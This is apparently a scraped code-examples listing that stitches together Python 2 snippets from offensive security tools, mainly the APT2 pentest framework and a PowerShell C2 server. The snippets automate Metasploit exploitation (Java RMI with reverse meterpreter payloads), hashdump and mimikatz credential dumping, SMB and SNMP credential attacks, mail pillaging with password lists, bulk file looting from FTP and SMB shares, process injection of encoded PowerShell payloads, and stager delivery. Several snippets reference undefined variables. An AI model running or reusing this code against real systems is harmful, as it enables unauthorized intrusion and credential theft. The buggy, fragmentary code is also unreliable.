示例#1
0
 def processTarget(self, t, port):
     if not self.seentarget(t + str(port)):
         self.addseentarget(t + str(port))
         self.display.verbose(self.shortName + " - Connecting to " + t)
         try:
             conn = httplib.HTTPConnection(t, port, timeout=10)
             conn.request('OPTIONS', '/')
             response = conn.getresponse()
             text = ""
             allowed = response.getheader('allow')
             outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
                 port) + "_" + Utils.getRandStr(10)
             if (allowed):
                 badoptions = ['PUT', 'DELETE', 'TRACE', 'TRACK']
                 for badopt in badoptions:
                     if (allowed.contains(badopt)):
                         self.fire("httpOption" + badopt)
                         self.addVuln(t, "httpOption" + badopt,
                                      {"port": str(port), "output": outfile.replace("/", "%2F")})
                         self.display.error("VULN [httpOption%s] Found on [%s:%i]" % (badopt, host, int(port)))
                 text = "Allowed HTTP Options for %s : %s\n\nFull Headers:\n%s" % (
                     t, allowed, self.print_dict(response.getheaders()))
             else:
                 text = "Allowed HTTP Options for %s : OPTIONS VERB NOT ALLOWED\n\nFull Headers:\n%s" % (
                     t, self.print_dict(response.getheaders()))
             Utils.writeFile(text, outfile)
         except httplib.BadStatusLine:
             pass
         # except socket.error as e:
         except:
             pass
示例#2
0
    def downloadAttachment(self, messageid=None):
        if (not self.srv):
            return

        if messageid:
            resp, data = self.srv.fetch(messageid,
                                        "(RFC822)")  # fetching the mail, "`(RFC822)`" means "get the whole stuff",
            # but you can ask for headers only, etc
            email_body = data[0][1]  # getting the mail content
            mail = email.message_from_string(email_body)  # parsing the mail content to get a mail object

            # Check if any attachments at all
            if mail.get_content_maintype() != 'multipart':
                return

            # we use walk to create a generator so we can iterate on the parts and forget about the recursive headach
            for part in mail.walk():
                # multipart are just containers, so we skip them
                if part.get_content_maintype() == 'multipart':
                    continue

                # is this part an attachment ?
                if part.get('Content-Disposition') is None:
                    continue

                filename = part.get_filename()

                if (not filename):
                    continue

                file_path = os.path.join(self.config["outdir"], filename)
                print "Downloading attachment [%s] to [%s]" % (messageid, file_path)
                Utils.writeFile(part.get_payload(decode=True), file_path, "wb")
        return
示例#3
0
    def searchDir(self, host, conn, share, path, depth=0):
        if depth > 5:
            return

        try:
            # list the files on each share (recursivity?)
            names = conn.listPath(share, path, timeout=30)

            for name in names:
                if name.isDirectory:
                    if name.filename not in [u'.', u'..']:
                        self.searchDir(conn, host, share, path + name.filename + '/', depth + 1)
                else:
                    for pattern in self.filepatterns:
                        try:
                            re.compile(pattern)
                            result = re.match(pattern, name.filename)
                            if (result):
                                #download the file
                                outfile = self.config["proofsDir"] + self.shortName + "_" + host + "_" + share + "_" + name.filename.replace("/", "-") + "_" + Utils.getRandStr(10)
                                temp_fh = StringIO()
                                conn.retrieveFile(share, path + name.filename, temp_fh)
                                temp_fh.seek(0)
                                Utils.writeFile(temp_fh.getvalue(), outfile)
                                self.display.debug("_____    Share[" + share + "] =" + path + name.filename)
                        except re.error:
                            pass
                            #self.display.debug("Invalid File Pattern --> %s <--" % pattern) 
        except:
            self.display.debug('### can not access the resource')

        return
示例#4
0
文件: searchftp.py 项目: 0x0mar/apt2
    def searchTarget(self, target, port, username, password):
        success = False
        # start packet capture
        cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
                          srcip="", dstip=target)
        try:
            if (Utils.port_open(target, 21)):
                # attempt to connect to the remote host
                with ftputil.FTPHost(target, username, password) as host:
                    success = True
                    # get list of files and loop over them
                    recursive = host.walk("/", topdown=True, onerror=None)
                    for root, dirs, files in recursive:
                        for name in files:
                            for pattern in self.filepatterns:
                                match_list = fnmatch.filter(files, pattern)
                                for fname in match_list:
                                    fpath = host.path.join(root, fname)
                                    if host.path.isfile(fpath):
                                        host.download(fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_"))
                    host.close()
        except ftputil.error.PermanentError:
            self.display.error("Could not connect to %s on port 21" % (target))

        outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
            port) + "_" + target + "_" + Utils.getRandStr(10)
        Utils.writeFile(self.getPktCap(cap), outfile)
        kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        return success
示例#5
0
    def run(self, argv):
        # load config
        self.parse_parameters(argv)
        self.load_config()

        # validate that all necessary flags/configs were set

        # if single username and password
        if (self.config["username"] and self.config["password"]):
            mp.pillage(username=self.config["username"], password=self.config["password"], server=self.config["server"], servertype=self.config["servertype"], domain=self.config["domain"])
        # if seperate username and password files
        elif (Utils.isReadable(self.config["usernamefile"]) and Utils.isReadable(self.config["passwordfile"])):
            usernames = list()
            passwords = list()
            with open(self.config["usernamefile"]) as f:
                usernames = f.read().splitlines()
            with open(self.config["passwordfile"]) as f:
                passwords = f.read().splitlines()
            for u in usernames:
                for p in passwords:
                    mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"])
        elif Utils.isReadable(self.config["usernamepasswordfile"]):
        # if a combined username password file
            usernames = list()
            with open(self.config["usernamepasswordfile"]) as f:
                usernamespasswords = f.read().splitlines()
            for temp in usernamepasswords:
                (u, p) = temp.split(":", 1)
                mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"])
示例#6
0
    def load_config(self):
        # does config file exist?
        if (self.config["config_filename"] is not None):
            temp1 = self.config
            temp2 = Utils.loadConfig(self.config["config_filename"])
            self.config = dict(temp2.items() + temp1.items())
        else:
            # guess not..   so try to load the default one
            if Utils.is_readable("default.cfg"):
                self.display.error("a CONFIG FILE was not specified...  defaulting to [default.cfg]")
                print
                temp1 = self.config
                temp2 = Utils.loadConfig("default.cfg")
                self.config = dict(temp2.items() + temp1.items())
            else:
                # someone must have removed it!
                self.display.error("a CONFIG FILE was not specified...")
                print
                sys.exit(1)

        # set verbosity/debug level
        if (self.config['verbose'] >= 1):
            self.display.enableVerbose()
        if (self.config['verbose'] > 1):
            self.display.enableDebug()
示例#7
0
 def view_event(self, data):
     log_path = Utils.get_arg_at(data, 1, 2)
     if log_path == "":
         UI.error("Missing arguments")
         return 
 
     log_path += ".log"
     
     rows = Utils.get_arg_at(data, 2, 2)
     if rows == "":
         rows = 10
     else:
         try:
             rows = int(rows)
         except:
             rows = 10
             
     log_path = Log.get_current_path(log_path)
     
     data = []
     
     if Utils.file_exists(log_path):
         for line in open(log_path, "rb").readlines():
             data.append(line)
         
         print "\nLast %d lines of log\n-----------------------\n" % rows    
         data = list(reversed(data))
         
         for i in range(0, rows):
             try:
                 print data[i]
             except:
                 pass
示例#8
0
 def exec_code(self, data):
     try:
         cmd, path = data.split(" ", 1)
     except:
         UI.error("Missing arguments")
         return ""
     
     data = ";"
     path = self.alias.get_alias(path)
     if Utils.file_exists(path, False, False):
         data = Utils.load_file_unsafe(path)
     else:
         data = Utils.download_url(path)     
         
     if not data == ";":
         UI.success("Fetching %s" % path)
         
         data = base64.b64encode(data)
         ps = Utils.load_powershell_script("exec.ps1", 12)
         ps = Utils.update_key(ps, "PAYLOAD", data)
         UI.success("Payload should be executed shortly on the target")
         return ps
     else:
         UI.error("Cannot fetch the resource")
         return data
示例#9
0
    def downloadAttachment(self, messageid=None):
        if (not self.srv):
            return

        if (not messageid):
            return

        (server_msg, body, octets) = self.srv.retr(messageid)

        msg = email.message_from_string('\n'.join(body))

        # save attach
        for part in msg.walk():
            if part.get_content_maintype() == 'multipart':
                continue

            if part.get('Content-Disposition') is None:
                continue

            filename = part.get_filename()

            if not (filename):
                continue

            file_path = os.path.join(self.config["outdir"], filename)
            print "Downloading attachment [%s] to [%s]" % (messageid, file_path)
            Utils.writeFile(part.get_payload(decode=True), file_path, "wb")
        return None
示例#10
0
    def writeMessage(self, messageid, text):
        filename = self.user + "_" + messageid
        filename = "".join(c for c in filename if c.isalnum()).rstrip()
        file_path = os.path.join(self.config["outdir"], filename)

        print "Downloading message id [%s] to [%s]" % (messageid, file_path)
        Utils.writeFile(text, file_path)
示例#11
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("getuid\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*Server username: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running as user [" + m.group(1).strip() + "]")

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("sysinfo\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            for line in text.splitlines():
                                m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
                                if (m):
                                    self.display.verbose("Metasploit Session [" + s +
                                            "] running on OS [" + m.group(1).strip() + "]")

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#12
0
 def processTarget(self, t, port):
     if not self.seentarget(t + str(port)):
         self.addseentarget(t + str(port))
         self.display.verbose(self.shortName + " - Connecting to " + t)
         outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(
             10) + ".png"
         url = "http://" + t + ":" + str(port)
         Utils.webScreenCap(url, outfile)
示例#13
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    # msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    # TODO - process results and store user list to KB
                    # need to do something better with this.
                    #    loop over each user and store in the KB
                    #        if local, store in "/host/" + t + "/user/" + user
                    #        if domain, store in "/domain/" + domainname + "/user/" + user

                    # for now, just print out the results
                    # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
                    parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
                    for part in parts:
                        if "RHOSTS" in part:
                            pass
                        else:
                            try:
                                pieces = part.split()
                                domain = pieces[3]
                                kb.add("domain/" + domain.strip() + "/host/" + t)
                                extras = part.split('(')[1].split(')')[0]
                                users = part.split('[')[3].split(']')[0].split(',')
                                for user in users:
                                    kb.add("host/" + t + "/user/" + user.strip())
                            except:
                                pass
                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#14
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('shell/' + t + '/msf')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            myMsf.lock.acquire()
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("hashdump\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")
                            msf.sleep(int(self.config['msfexploitdelay']))

                            # TODO - process results and store results in KB
                            # regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            myMsf.lock.release()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("load mimikatz\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("wdigest\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#15
0
 def powerless(self, data):
     try:
         cmd, ps_cmd = data.split(" ", 1)
     except:
         UI.error("Missing arguments")
         return ""
            
     ps = Utils.load_powershell_script("powerless.ps1", 22)
     ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(ps_cmd))
     return ps
示例#16
0
文件: mynmap.py 项目: HMSH00D/apt2
    def run(self, target="127.0.0.1", ports="1-1024", flags="-sS", vector="", filetag=""):
        # get tmp file
        proofsDir = ""
        if "proofsDir" in self.config.keys():
            proofsDir = self.config["proofsDir"]
        self.outfile = proofsDir + "NMAP-" + filetag + "-" + Utils.getRandStr(10)

        command = "nmap " + flags + " -p " + ports + " -oA " + self.outfile + " " + target
        tmp_results = Utils.execWait(command)
        self.display.output("Scan file saved to [%s]" % self.outfile)

        return self.loadXMLFile(self.outfile + ".xml", "nmapFile")
示例#17
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)

                    myMsf.lock.acquire()

                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use exploit/multi/misc/java_rmi_server\n")
                    msf.execute("set RHOST %s\n" % t)
                    #msf.execute("set TARGET 0\n")
                    msf.execute("set TARGET 2\n")
                    msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp") 
                    msf.execute("set LPORT 4445\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    result = msf.getResult()

                    myMsf.lock.release()

                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Meterpreter session.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "JavaRMI", {"port": "1099", "output": outfile.replace("/", "%2F")})

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#18
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                self.display.verbose(self.shortName + " - Connecting to " + t)
                # get windows domain/workgroup
                temp_file2 = self.config[
                    "proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(
                        10)
                command2 = "nmblookup -A " + t
                result2 = Utils.execWait(command2, temp_file2)
                workgroup = "WORKGROUP"
                for line in result2.split('\n'):
                    m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
                    if (m):
                        workgroup = m.group(1).strip()
                        self.display.debug(
                            "found ip [%s] is on the workgroup/domain [%s]" %
                            (t, workgroup))

                # make outfile
                outfile = self.config[
                    "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                        10)

                # run rpcclient
                command = "smbclient -N -W " + workgroup + " -L " + t
                result = Utils.execWait(command, outfile)

                # check to see if it worked
                if "Anonymous login successful" in result:
                    # fire a new trigger
                    self.fire("nullSession")
                    self.addVuln(t, "nullSession", {
                        "type": "smb",
                        "output": outfile.replace("/", "%2F")
                    })
                    self.display.error("VULN [NULLSession] Found on [%s]" % t)

                    # TODO - process smbclient results
                    # parse out put and store any new info and fire any additional triggers
                else:
                    # do nothing
                    self.display.verbose("Could not get NULL Session on %s" %
                                         t)
        return
示例#19
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=int(self.config['msfport']),
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use exploit/multi/misc/java_rmi_server\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set TARGET 0\n")
                    msf.execute("set PAYLOAD java/meterpreter/reverse_tcp\n")
                    msf.execute("run\n")
                    msf.sleep(5)

                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    result = msf.getResult()
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*Meterpreter session.*", result)
                    for part in parts:
                        callFire = True
                        self.addVuln(t, "JavaRMI", {
                            "port": "1099",
                            "output": outfile.replace("/", "%2F")
                        })

            if callFire:
                self.fire("msfSession")

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#20
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'],
                            port=self.config['msfport'],
                            user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("hashdump\n")
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("load mimikatz\n")
                            msf.execute("wdigest\n")
                            msf.execute("background\n")

                            # TODO - process results and store results in KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
示例#21
0
    def add_tag(self, buffer, current_line):
        self.tags_selection[current_line] = (self.tags_selection[current_line] + 1) % 2
        if self.tags_selection[current_line] == 0:
            self.utils.add_breakpoint(Utils.convert_to_one_index(current_line))
        else:
            self.utils.remove_breakpoint(Utils.convert_to_one_index(current_line))

        if self.tags[current_line] is None:
            self.tags[current_line] = buffer.create_tag("tag_" + str(current_line), background="orange")
            buffer.apply_tag(self.tags[current_line], buffer.get_iter_at_line(current_line),
                             buffer.get_iter_at_line(current_line + 1))
            return
        self.tags[current_line].props.background = self.colors[self.tags_selection[current_line]]
示例#22
0
 def test_kato_file_extract(self):
     src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR,
                                  'web_statgov_kato.json')
     json_raw = Utils.read_file(src_conf_path)
     download_handler = HandlersFactory.get_handler(
         Downloader.handler_name(json_raw))
     service = Downloader(json_raw, download_handler)
     file_path = service.download()
     extract_handler = HandlersFactory.get_handler(
         Extractor.handler_name(json_raw))
     service = Extractor(json_raw, file_path, extract_handler)
     file_paths = service.extract()
     self.assertTrue(Utils.all_exists(file_paths))
示例#23
0
  def inject(self, data):
      try:
          option, pid, cmd = data.split(" ", 2)
      except:
          UI.error("Missing arguments")
          return ""
 
      ps = Utils.load_powershell_script("injector.ps1", 1)
      ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
      ps = Utils.update_key(ps, "PID", pid)
      UI.success("Injecting %s" % cmd)
      UI.success("Into process with PID %s" % pid)
      return ps
示例#24
0
 def list_clients(self, data):
     print "\nList of active shells\n-----------------------\n"
     for shell in self.db.get_all_shells():
         guid = shell.split(":")[0]
         timestamp = Utils.unix_to_date(self.db.get_data(shell))
         prompt = self.db.get_data("%s:prompt" % guid)
         id = self.db.get_data("%s:id" % guid)
         
         if not id == "":
             if Utils.get_arg_at(data, 1, 2) == "full":
                 print "  %s\t%s %s last seen %s" % (id, prompt, guid, timestamp)
             else:
                 print "  %s\t%s" % (id, prompt)
示例#25
0
  def inject(self, data):
      try:
          option, pid, cmd = data.split(" ", 2)
      except:
          UI.error("Missing arguments")
          return ""
 
      ps = Utils.load_powershell_script("injector.ps1", 1)
      ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
      ps = Utils.update_key(ps, "PID", pid)
      UI.success("Injecting %s" % cmd)
      UI.success("Into process with PID %s" % pid)
      return ps
示例#26
0
 def list_clients(self, data):
     print("\nList of active shells\n"+"-"*21+"\n")
     for shell in self.db.get_all_shells():
         guid = shell.split(":")[0]
         timestamp = Utils.unix_to_date(self.db.get_data(shell))
         prompt = self.db.get_data("%s:prompt" % guid)
         id = self.db.get_data("%s:id" % guid)
         
         if not id == "":
             if Utils.get_arg_at(data, 1, 2) == "full":
                 print("  %s\t%s %s last seen %s" % (id, prompt, guid, timestamp))
             else:
                 print("  %s\t%s" % (id, prompt))
示例#27
0
    def downloadMessage(self, messageid=None):
        if (not self.srv):
            return

        if messageid:
            (server_msg, body, octets) = self.srv.retr(messageid)

            filename = self.user + "_" + str(messageid)
            file_path = os.path.join(self.config["outdir"], filename)

            print "Downloading message id [%s] to [%s]" % (messageid, file_path)
            Utils.writeFile(email_body, file_path)
        return None
示例#28
0
 def inject(self):
     try:
         (option, pid, cmd) = self.data.split(" ", 2)
     except:
         self.output += self.output_cli_or_str("Missing arguments")
         return ""
     ps = Utils.load_powershell_script(
         "%s/injector.ps1" % THUNDERSHELL.POWERSHELL_SCRIPT, 1)
     ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
     ps = Utils.update_key(ps, "PID", pid)
     self.output += self.output_cli_or_str("Injecting %s" % cmd)
     self.output += self.output_cli_or_str("Into process with PID %s" % pid)
     return ps
示例#29
0
        def do_GET(self):
            force_download = False
            if self.path.split("/")[1] == "api":
                server_api = ServerApi(self.config, self)
                self.output = server_api.process()
                self.return_json()
                return

            path = self.path.split("/")[-1]
            payload_path = self.path.split("/")
            filename = Utils.gen_str(12)

            if payload_path[1] == self.config.get("http-download-path"):
                force_download = True
                extension = "ps1"
                payload = Payload(self.config)
                payload.set_callback("__default__")

                profile = self.config.get("profile")
                if profile.get("domain-fronting") == "on":
                    payload.set_fronting(profile.get("domain-fronting-host"))

                if len(payload_path) > 3:
                    payload.set_type(payload_path[2])
                    extension = payload_path[2]
                    if extension == "exe-old": extension = "exe"

                if len(payload_path) > 4:
                    payload.set_delay(payload_path[3])
                    payload.set_callback(payload_path[4])

                filename = "%s.%s" % (Utils.gen_str(12), extension)
                Log.log_event(
                    "Download Stager",
                    "Stager was fetched from %s (%s). Stager type is %s" %
                    (self.client_address[0], self.address_string(), extension))

                self.output = payload.get_output()

            elif path in Utils.get_download_folder_content():
                force_download = True
                self.output = Utils.load_file("download/%s" % path)
                Log.log_event(
                    "Download File", "%s was downloaded from %s (%s)" %
                    (path, self.client_address[0], self.address_string()))

            else:
                self.output = Utils.load_file(
                    "html/%s" % self.config.get("http-default-404"))
                Log.log_error("Invalid request got a GET request", self.path)
            self.return_data(force_download, filename)
示例#30
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # If any results are succesful, this will become true and Fire will be called in the end
            callFire = False
            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    myMsf.lock.acquire()
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("set VERSION 2c\n")
                    msf.execute("exploit\n")
                    msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()
                    myMsf.lock.release()

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)

                    parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
                    for part in parts:
                        callFire = True
                        # Add all relevant details
                        p = part.split()
                        comString = p[p.index("SUCCESSFUL:") + 1]
                        self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString,
                                                     "output": outfile.replace("/", "%2F")})

            if callFire:
                self.fire("snmpCred")

            # clean up after ourselves
            result = msf.cleanup()

        return
 def output(self):
     job_file = os.path.join(JOBS_CONFIG_DIR, str(self.jobfile))
     job_conf = Utils.read_file(job_file)
     base = os.path.basename(self.input().path)
     day = dt.today().strftime("%Y%m%d")
     ftp_path = os.path.join(
         FTP_REMOTE_PATH, "{}_{}.{}".format(
             os.path.splitext(base)[0], day, Utils.ext(self.input().path)))
     if Box(json.loads(job_conf)).gzip:
         ftp_path += '.gzip'
     return RemoteTarget(ftp_path,
                         FTP_HOST,
                         username=FTP_USER,
                         password=FTP_PASS)
示例#32
0
 def test_companies_files_extract(self):
     src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR,
                                  'web_statgov_companies.json')
     json_raw = Utils.read_file(src_conf_path)
     download_handler = HandlersFactory.get_handler(
         Downloader.handler_name(json_raw))
     service = Downloader(json_raw, download_handler)
     downloaded_files_path = service.download()
     extract_handler = HandlersFactory.get_handler(
         Extractor.handler_name(json_raw))
     service = Extractor(json_raw, downloaded_files_path, TEMP_PATH,
                         extract_handler)
     all_files = service.extract()
     self.assertTrue(Utils.all_exists(all_files))
示例#33
0
 def get_autocommands(self, guid):
     profile = self.config.get('profile')
     commands = profile.get('autocommands')
     if isinstance(commands, list):
         UI.success('Running auto commands on shell %s' % guid)
         Log.log_event('Running auto commands on shell', guid)
         for command in commands:
             print '\t[+] %s' % command
             Log.log_shell(guid, 'Sending', command)
             self.db.append_shell_data(
                 guid, "[%s] AutoCommand Sending: \n%s\n" %
                 (Utils.timestamp(), command))
             self.db.push_cmd(guid, command, Utils.guid(),
                              self.config.get('username'))
示例#34
0
    def __init__(self):

        disp_no = os.getenv("DISPLAY")
        if disp_no:
            logger.debug("I'm running under X display = {0}".format(disp_no))

        # Check which frame buffer drivers are available
        # Start with fbcon since directfb hangs with composite output
        drivers = ['fbcon', 'directfb', 'svgalib']
        found = False
        pygame.init()
        pygame.display.init()
        '''
        for driver in drivers:
            # Make sure that SDL_VIDEODRIVER is set
            if not os.getenv('SDL_VIDEODRIVER'):
                os.putenv('SDL_VIDEODRIVER', driver)
            try:
                pygame.display.init()
            except pygame.error:
                logger.debug('Driver: {0} failed.'.format(driver))
                continue
            found = True
            break
        '''
        pygame.font.init()
        pygame.mouse.set_visible(0) #hide mouse
        self.screen = pygame.display.set_mode((WIDTH, HEIGHT))
        #self.screen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN)
        pygame.display.set_caption('Menu')
        self.clock = pygame.time.Clock()
        self.running = True
        self.loadAssets()
        logger.debug("launch joystics init...")
        utils = Utils()
        utils.initJoysticks()
        #disable mouse
        pygame.event.set_blocked(pygame.MOUSEMOTION)
        #movements and keys init
        self.downPushed = False
        self.upPushed = False
        self.leftPushed = False
        self.rightPushed = False
        self.joyUp = False
        self.joyDown = False
        self.joyLeft = False
        self.joyRight = False
        self.zPressed = False
        self.tPressed = False
        self.screensaver = False
示例#35
0
文件: responder.py 项目: 0x0mar/apt2
    def process(self):
        temp_file = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)

        command = "responder -I eth0 -wrf"
        # run for 15 minutes
        # result = Utils.execWait(command, temp_file, timeout=900)
        result = Utils.execWait(command, temp_file, timeout=60)

